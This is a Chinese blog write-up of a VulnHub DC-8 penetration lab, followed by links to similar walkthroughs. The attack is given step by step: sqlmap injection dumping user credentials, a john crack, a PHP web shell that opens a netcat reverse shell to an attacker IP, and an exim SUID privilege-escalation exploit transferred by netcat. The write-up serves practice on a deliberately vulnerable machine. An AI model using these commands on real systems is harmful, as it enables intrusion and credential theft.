DC-8靶机渗透实战

最新推荐文章于 2024-10-02 22:24:36 发布
最新推荐文章于 2024-10-02 22:24:36 发布
阅读量52 收藏 1
点赞数 3
文章标签: 笔记 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74545038/article/details/133888822
版权

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

#主机探测-端口扫描

arp-scan -l
nmap -F -T4 -sS -sV 192.168.43.12

#指纹识别-目录爆破

whatweb http://192.168.43.12
dirsearch -u http://192.168.43.12

#Web界面-登录界面

/user/login  --登陆界面

#URL存在Sql注入

首页存在sql注入

#Sqlmap梭哈-

库
sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D --current-db
表
sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D 'd7db' --tables
字段名
sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D 'd7db' -T 'users' --columns
字段
sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -C 'name,pass,uid' -dump
#得到的账密保存下来--->mima.txt

 

 

 

#john猜解密码

john mima.txt   ---turtle

#web登录john用户-写马

#🐎子在哪里写??
<?php system("nc -e /bin/bash 192.168.43.33 8888");?>
#返回主页提交表单

#反弹shell

kali:
nc -lvvp 8888
python -c "import pty;pty.spawn('/bin/bash')"

#SUID提权-exim

find / -user root -perm -4000 -print 2>/dev/null
#存在exim
exim --version  --4.89

 

#上传46996.sh到靶机

searchsploit exim   ---找本地权限提升的脚本,也就是local privilege esc
cp /usr/....../46996.sh .
nc -lnvp 192.168.43.12 2333 < 46996.sh
靶机:
nc 192.168.43.33 2333 > 46996.sh

 

#运行脚本

cd /tmp
chmod 777 46996.sh
./46996.sh -m netcat

#FLAG

cat flag.txt

别野加奈176
关注
DC-1靶机渗透实战
a1ExT
08-28 100
DC-1是一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。它旨在对初学者来说是一个挑战,但它的难易程度取决于您的技能和知识以及您的学习能力。要成功完成这一挑战,您需要 Linux 技能、熟悉 Linux 命令行以及基本渗透测试工具的经验,例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。有多种方法可以扎根,但是,我包括了一些包含初学者线索的标志。总共有五个标志,但最终目标是在 root 的主目录中查找并读取该标志。
Vulnhub靶机渗透测试–DC-4靶机渗透实战
御七彩虹猫
10-09 1489
写了WP在个人博客 https://www.takagisan.top/index.php/2021/10/09/vulnhub%e9%9d%b6%e6%9c%ba%e6%b8%97%e9%80%8f%e6%b5%8b%e8%af%95-dc-4%e9%9d%b6%e6%9c%ba%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/
dc-3 靶机渗透学习
..
03-17 3588
靶机修复 dc-3靶机可能会存在扫不到靶机ip的问题,可以参考下面这篇博客解决,编辑网卡配置文件时命令有点错误。 vim /etc/network/interfacers 改成 vim /etc/network/interfaces Vulnhub靶机检测不到IP地址_阿帅start的博客-CSDN博客_靶机没有ip 信息收集 使用nmap对当前网段进行扫描 nmap -sP 192.168.202.0/24 在排除kali攻击机和物理机ip后,对192.168.2...
DC-5靶机渗透详细步骤
wwxxss
10-18 737
DC5渗透测试
dc-4 靶机渗透学习
..
03-19 3162
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1778
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
DC-8靶机渗透
洛柒尘的博客
01-15 545
前言 为了学习渗透过程,因此跟着皮卡皮卡丘的个人空间学习渗透vulnhub 准备 目标:获得root权限并拿下flag 靶机:vulnhub-DC-8 链接:https://www.vulnhub.com/entry/dc-8,367/ 环境设置:下载后为ova文件,导入到VM中,将网络连接方式改为NAT 参考链接 渗透过程1 渗透过程2 渗透过程 主机发现 nmap Nmap -sP 192.168.43.0/24 Starting Nmap 7.70 ( https://nmap.org ) a
DC-1靶机渗透复现(详细教程)
hqhhhh的博客
10-09 396
DC-1靶机渗透实战教学,非常详细!包学包会
DC-2靶机渗透全流程详细
qq_63940076的博客
03-20 1938
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
【靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1232
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1427
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
dc-1靶机实战详情(新手)
kyp_1994的博客
08-28 1144
dc-1靶机详细获取flag过程新手勿喷
2021-8-11dc3靶机实战记录(磁盘配置不正确解决方案,joomla渗透学习,)
qq_45290991的博客
08-11 389
这个靶机有点意思,因为我之前从没见过java类的中间件站,所以也是从这一刻起我坚定了之后一定要学习java的决心。 谁料一进去就遇到难题: 百度之后得到解决方案: vmware报这个错: IDE 设备(磁盘/CD-ROM)配置不正确。“ide1:1”上具有一个 IDE 从设备,但没有主设备。此配置在虚拟机中无法正常运行。请使用配置编辑器将磁盘/CD-ROM 从“ide1:1”移到“ide1:0”。 原因就是我手溅把光驱给删除了,就一直报这个错! 解决方法: 选择具体的虚拟机,点 “虚拟机
AIGC学习笔记—minimind详解+训练+推理
m0_56569131的博客
09-27 288
这个开源项目是带我的一个导师,推荐我看的,记录一下整个过程,总结一下收获。这个项目的slogan是“大道至简”,确实很简。作者说是这个项目为了帮助初学者快速入门大语言模型(LLM),通过从零开始训练一个仅26MB的微型语言模型MiniMind,最快可在3小时内完成。降低学习LLM的门槛,让更多人能够轻松上手。MiniMind极其轻量,约为GPT-3的1/7000,适合普通个人GPU进行快速推理和训练。
笔记)第三期书生·浦语大模型实战营(十一卷王场)--书生入门岛通关第2关Python 基础知识
haidizym的博客
10-02 331
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1mS421X7h4/课程文档:https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python。
江科大笔记—LED闪烁& LED流水灯& 蜂鸣器
m0_62005595的博客
09-28 468
LED闪烁& LED流水灯& 蜂鸣器
OpenGL笔记十九之相机系统
最新发布
小勇博客
10-02 324
— 2024-10-02 晚上。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值